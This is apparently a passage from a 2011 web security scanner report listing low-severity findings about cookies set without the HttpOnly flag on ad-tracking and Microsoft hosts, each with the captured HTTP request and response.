Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAQAAAACgAAAAuQAE6OjgBOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAACh81E0nfNRNGwEAALYx2E22MdhNDQAAAOtv2E3rb9hNdQAAACu5500quedNoAEAAHks6E0aK+hNKwIAAFs76U1NO+lNZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAEVGFE5+RRROCQAAABMAAAALkABOjo4ATmYAAAB/O+lNfzvpTRUAAADrb9hN62/YTUQAAAAruedNKrnnTZQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAABFRhROfkUUTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 12:00:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAQAAAACgAAAAuQAE6OjgBOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAAF9OFE5fThROGwEAALYx2E22MdhNDQAAAOtv2E3rb9hNdQAAACu5500quedNoAEAAHks6E0aK+hNKwIAAFs76U1NO+lNZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAEVGFE5+RRROCQAAABMAAABfThROX04UTmYAAAB/O+lNfzvpTRUAAADrb9hN62/YTUQAAAAruedNKrnnTZQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAABFRhROfkUUTgAAAAA-; path=/; expires=Sat, 03-Jul-2021 12:00:31 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

10.47. http://m.webtrends.com/dcs55hahh00000c9vfc2qpg8w_5e9d/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.webtrends.com
Path:   /dcs55hahh00000c9vfc2qpg8w_5e9d/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs55hahh00000c9vfc2qpg8w_5e9d/dcs.gif?&dcsdat=1309951083852&dcssip=zune.net&dcsuri=/en-US/default.htm&WT.tz=-5&WT.bh=6&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Zune%20software,%20Zune%20HD%20players,%20and%20the%20Social%20|%20Zune.net&WT.js=Yes&WT.jv=1.5&WT.bs=1057x822&WT.fi=Yes&WT.fv=10.3&WT.dl=0&WT.sp=_en-us_&WT.cg_n=Home&WT.wtsv=1&WT.sv_sp=_en-us_&WT.co_f=173.193.214.243-3661456592.30151123&WT.vt_f=1&WT.vt_f_a=1&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_sid=173.193.214.243-3661456592.30151123.1309951083855&wtEvtSrc=zune.net/en-US/default.htm&wtDrillDir=/en-us/ HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://zune.net/en-US/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAANAAAACgAAAAuQAE6OjgBOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAACh81E0nfNRNGwEAALYx2E22MdhNDQAAAOtv2E3rb9hNdQAAACu5500quedNoAEAAHks6E0aK+hNKwIAAFs76U1NO+lNZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOBwAAABMAAAALkABOjo4ATmYAAAB/O+lNfzvpTRUAAADrb9hN62/YTUQAAAAruedNKrnnTZQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 11:19:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAPAAAACgAAAAuQAE6OjgBOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAACh81E0nfNRNGwEAALYx2E22MdhNDQAAAOtv2E3rb9hNdQAAACu5500quedNoAEAAHks6E0aK+hNKwIAAFs76U1NO+lNZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAKhEFE5rRBROegAAAIpEFE6KRBROCAAAABMAAAALkABOjo4ATmYAAAB/O+lNfzvpTRUAAADrb9hN62/YTUQAAAAruedNKrnnTZQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACoRBROa0QUTgAAAAA-; path=/; expires=Sat, 03-Jul-2021 11:19:04 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

10.48. http://m.webtrends.com/dcsqv1k1u100004v2eennc1xv_9v6o/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.webtrends.com
Path:   /dcsqv1k1u100004v2eennc1xv_9v6o/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsqv1k1u100004v2eennc1xv_9v6o/dcs.gif?&dcsdat=1309951114747&dcssip=social.zune.net&dcsuri=/fragments/ccm/video/moviedetail/xbox.htm&dcsqry=%3Ftarget=web&dcsref=http://zune.net/en-US/&WT.tz=-5&WT.bh=6&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Video%20MovieDetail%20ZuneonXbox&WT.js=Yes&WT.jv=1.5&WT.bs=1057x822&WT.fi=Yes&WT.fv=10.3&WT.dl=0&WT.cg_n=Social&WT.cg_s=Video&WT.sp=_en-us_&WT.wtsv=1&WT.sv_sp=_en-us_&WT.co_f=173.193.214.243-3661456592.30151123&WT.vt_f_tlh=1309951083&WT.vt_sid=173.193.214.243-3661456592.30151123.1309951083855&wtEvtSrc=social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842&wtDrillDir=/movies/;/movies/0/;/movies/0/34fa18ec-ecda-4609-be85-ce80d58c3842/ HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842?target=web
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAOAAAACgAAAAuQAE6OjgBOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAACh81E0nfNRNGwEAALYx2E22MdhNDQAAAOtv2E3rb9hNdQAAACu5500quedNoAEAAHks6E0aK+hNKwIAAFs76U1NO+lNZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROCAAAABMAAAALkABOjo4ATmYAAAB/O+lNfzvpTRUAAADrb9hN62/YTUQAAAAruedNKrnnTZQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACFRBROa0QUTgAAAAA-

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Wed, 06 Jul 2011 11:18:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcsqv1k1u100004v2eennc1xv_9v6o/dcs.gif?dcsredirect=112&dcstlh=0&dcstlv=0&dcsdat=1309951114747&dcssip=social.zune.net&dcsuri=/fragments/ccm/video/moviedetail/xbox.htm&dcsqry=%3Ftarget=web&dcsref=http://zune.net/en-US/&WT.tz=-5&WT.bh=6&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Video%20MovieDetail%20ZuneonXbox&WT.js=Yes&WT.jv=1.5&WT.bs=1057x822&WT.fi=Yes&WT.fv=10.3&WT.dl=0&WT.cg_n=Social&WT.cg_s=Video&WT.sp=_en-us_&WT.wtsv=1&WT.sv_sp=_en-us_&WT.co_f=173.193.214.243-3661456592.30151123&WT.vt_f_tlh=1309951083&WT.vt_sid=173.193.214.243-3661456592.30151123.1309951083855&wtEvtSrc=social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842&wtDrillDir=/movies/;/movies/0/;/movies/0/34fa18ec-ecda-4609-be85-ce80d58c3842/
Content-Length: 0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAPAAAACgAAAAuQAE6OjgBOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAACh81E0nfNRNGwEAALYx2E22MdhNDQAAAOtv2E3rb9hNdQAAACu5500quedNoAEAAHks6E0aK+hNKwIAAFs76U1NO+lNZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROCAAAABMAAAALkABOjo4ATmYAAAB/O+lNfzvpTRUAAADrb9hN62/YTUQAAAAruedNKrnnTZQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTgAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"


10.49. https://msnia.login.live.com/ppsecure/post.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://msnia.login.live.com
Path:   /ppsecure/post.srf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: msnia.login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12632
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:33 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-3040ca2c-de70-4a63-9d3d-1c68eed3a3d2; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: TK2IDSMLGN1A10 V: 0
Date: Wed, 06 Jul 2011 11:21:32 GMT
Connection: close

<!-- ServerInfo: TK2IDSMLGN1A10 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountr
...[SNIP]...

10.50. http://p.brilig.com/contact/bct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/bct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2723&action=1 HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:55 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon, 19 Dec 1983 11:21:55 GMT
Set-Cookie: BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e; Domain=.brilig.com; Expires=Fri, 28-Jun-2041 11:21:55 GMT
Set-Cookie: bbid=AF3T0Zvr3k_eAKyttHO-2Y1-pj49skQ7XBb4DdQez_xwtEQ2i2wCqlfNJBcdkfO00ZvFh22PnRrg; Domain=.brilig.com; Expires=Fri, 28-Jun-2041 11:21:55 GMT
Set-Cookie: tc="26:4499"; Version=1; Domain=.brilig.com; Max-Age=946080000; Expires=Fri, 28-Jun-2041 11:21:55 GMT
X-Brilig-D: D=6320
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 133

<iframe frameborder='0' src='http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999?nocache=1754&1=999'width='0' height='0'></iframe>

10.51. http://pinpoint.microsoft.com/en-US/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pinpoint.microsoft.com
Path:   /en-US/Default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/Default.aspx HTTP/1.1
Host: pinpoint.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: PP_lcName=en-US; domain=.pinpoint.microsoft.com; expires=Sat, 06-Aug-2011 11:40:32 GMT; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: PP_lcName=en-US; domain=.pinpoint.microsoft.com; expires=Sat, 06-Aug-2011 11:40:32 GMT; path=/; HttpOnly
Set-Cookie: PPUser=id=94a72ed4-4b40-4cd6-aa7b-d89cf8478a15&key=LEt6O9b7EPr71bWJCfnFa5ZX5/TP8cUB6LSZcQ4+fG4=&cacheId=00000000-0000-0000-0000-000000000000; expires=Thu, 05-Jul-2012 11:40:32 GMT; path=/; HttpOnly
Set-Cookie: hmcs=st=&in=; path=/; HttpOnly
Set-Cookie: GASurveyCookie=GASurveyTrackingCookie_A=en-US/Default.aspx&GASurveyTrackingCookie_B=; path=/
Set-Cookie: sbp=ph=2546101483&fst=0; path=/; HttpOnly
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
Date: Wed, 06 Jul 2011 11:40:32 GMT
Connection: close
Content-Length: 73799


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Master_Head1"><me
...[SNIP]...

10.52. http://pix04.revsci.net/D08734/a1/0/0/0.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESENrwGpiUbhitM9fS6DyZedo&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=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; 
rtc_Vpu9=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; udm_0=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; rsiPus_feb9="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"; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:09 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:09 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Wed, 06 Jul 2011 14:01:09 GMT

GIF89a.............!.......,...........D..;

10.53. http://pix04.revsci.net/G10937/a4/0/0/0.302

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /G10937/a4/0/0/0.302

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /G10937/a4/0/0/0.302?tgt=http%3A%2F%2Fib.adnxs.com%2Fseg%3Fmember%3D514%26add_code%3D%7Bsegs%7D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=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; rtc_Vpu9=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; rsiPus_TE1N="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"; rsi_us_1000000="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"; 
udm_0=MLv3NzUNbjpr3hfhvURQO7bVnc3Latc29T4IRbcs6OIWwxvfrNL/DOg1H1jrVqpsW0lWW4HtqMd7E+Uk5EzwLMOJAF+KNwwvW70D8Wocb+lGcNYP/uVmI8EAnSaGIlLRuAZXx5ZGXJTbr4U67p6Nmptr4BJmF8czLH3P6CzlXoqpP/AqWqHnFiNetqPWOif4QVTii6uy+8fRFg3ceiBW4qlM/6vhrY47MwXPFbPvvHDJ3QtIInpUPLFKnoac2xOWgbaZU82eHi3DdXUTS9R4AV4RQ+dn9HWu9sMszBaK/WByvVshR4FnYfVtmSItAsfgC7n1tO1YdoHGVxupt/38v1DYoEvv8mHa1TNZXOYZ+PKeLqhyRjT5FA3BIAdkEnZeU/b8qRIXTPPZsXfV8y2DtD4UvHS2lhhVN7vY6Ktt8kn5aAEKM/sI99+4Y44sdqDU7C4U3d2buYp9bKOzrlZoJStEZTC9cMt4uOkwOQKq+HClC0YwpnRI+RYgR22ErSsIpamH8gzUv57gNxj4RxN8PSQE2dJBoo3wLtqLVA65yBuEzbCE5YZT2PoTFoYC7HUf+RwSGVqHLBAdy3gFEaxmYdMIaD/cSHi46fXLe8Cjx34VD2Dnbq+YzIx1JE79YKvGlEBJPPViqmJAVNOAwegES9AFZTsC9sJnl5s/497ONiFtBSEmn4BiuHzFLKi7C2XxRiPNqV43M7bWFYQ